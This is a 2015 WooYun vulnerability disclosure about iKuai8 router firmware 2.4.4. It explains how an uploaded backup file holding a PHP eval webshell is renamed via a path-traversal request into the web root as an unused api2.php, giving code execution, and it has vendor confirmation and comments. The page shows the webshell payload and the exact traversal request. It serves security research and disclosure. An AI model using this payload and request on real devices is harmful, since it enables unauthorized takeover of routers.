当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122637

漏洞标题:爱快流控路由最新版(iKuai8_2.4.4_Build20150604-17_41)固件漏洞挖掘分析之三

相关厂商:爱快免费流控路由

漏洞作者: Bear baby

提交时间:2015-06-25 10:01

修复时间:2015-09-23 14:36

公开时间:2015-09-23 14:36

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-25: 细节已通知厂商并且等待厂商处理中
2015-06-25: 厂商已经确认,细节仅向厂商公开
2015-06-28: 细节向第三方安全合作伙伴开放
2015-08-19: 细节向核心白帽子及相关领域专家公开
2015-08-29: 细节向普通白帽子公开
2015-09-08: 细节向实习白帽子公开
2015-09-23: 细节向公众公开

简要描述:

固件版本:iKuai8_2.4.4_Build20150604-17_41
固件下载地址:http://patch.ikuai8.com/iso/iKuai8_2.4.4_Build20150604-17_41.iso
分析使用到的工具:EditPlus、DreamWeaver、Zend Studio、Ida Pro 6.1、BeyondCompare、Fiddler、中国菜刀、Kali、VisualStudio2010、vmware11等
注:本文基于逆向获取到的源文件进行分析。
本集介绍:任意文件操作?我们要webshell。

详细说明:

通过前面的任意文件操作漏洞我们可以重命名、移动任意文件。自然想到可以通过上传个webshell,然后用重命名为php实现获取webshell。
我们来尝试一下。这边使用的是系统备份页面的上传。部分代码如下:

//上传文件入口
	 public function up()
	{    
         switch(trim($_POST['upload_type'])){
		     case 'sys_ver':$dir = '/tmp/updata/';rrmdir($dir);break; //清空当前目录下所有文件
			 case 'pro_ver':$dir = '/tmp/libupdata/';rrmdir($dir);break;
			 case 'bak_upload':$dir = '/etc/mnt/bak/';break;
			 default:break;
		 }


备份上传保存的位置为/etc/mnt/bak。
首先上传一个名为2.bak的webshell,内容为<?php @eval($_POST['a']);?>

11.png


post一个重命名请求,内容如下,将2.bak重命名并移动到系统web目录下的2.php
bakname=..%2F..%2F..%2Fusr%2Fikuai%2Fwww%2F2.php&old_bakname=2.bak

22.png


文件已经移动到web目录了,但是访问是404。

77.png


最终发现在 /etc/lighttpd/lighttpd.conf。第189行。

url.rewrite = ("^/resources/(.*.gif|.*.png|.*.jpg|.*.pdf|.*.js|.*.css)" =>"/resources/$1","api.php"=>"api.php","api2.php"=>"api2.php","^(.*)$" => "/index.php/$1")


将静态资源rewrite到resources文件夹,api.php rewrite到api.php, api2.php rewrite到api2.php,其他都rewrite到index.php的参数。所以我们上传的shell都显示404。
但是问题出在"api2.php"=>"api2.php",web目录下面并没有api2.php,估计是测试时使用的,发布出来没删除掉。直接来个移花接木直接把webshell重命名为api2.php。浏览器访问空白,没有出现404错误了。

44.png


55.png

漏洞证明:

用菜刀连接,成功连接webshell。

66.png

修复方案:

相信你们会的。。下集明天播放,今天不行了。。感冒太严重了,还要期末考。下集精彩剪辑(命令执行)

版权声明:转载请注明来源 Bear baby@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-06-25 14:34

厂商回复:

几个都是上传漏洞,的确疏忽,也非常感谢熊宝在复习的间隙还拿出时间帮我们做检测,感谢

最新状态:

暂无

漏洞评价:

评论

  1. 2015-06-25 10:46 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

    大牛这是二进制吗?

  2. 2015-06-25 12:30 | Bear baby ( 普通白帽子 | Rank:183 漏洞数:20 | 善攻者,不知其所守。善守者,不知其所攻。)

    @scanf 不是呢。。

  3. 2015-06-25 12:37 | CplusHua ( 普通白帽子 | Rank:238 漏洞数:33 | 乌云奖金:-1)

    这是秀工具的.......其实只要sublimeText2 firefox

  4. 2015-06-25 12:46 | Bear baby ( 普通白帽子 | Rank:183 漏洞数:20 | 善攻者,不知其所守。善守者,不知其所攻。)

    @CplusHua 不是呢。。因为是一系列的,不是每集都全用。。

  5. 2015-06-29 10:33 | Manning ( 普通白帽子 | Rank:559 漏洞数:78 | 就恨自己服务器太少)

    吓一跳,以为全是逆向呢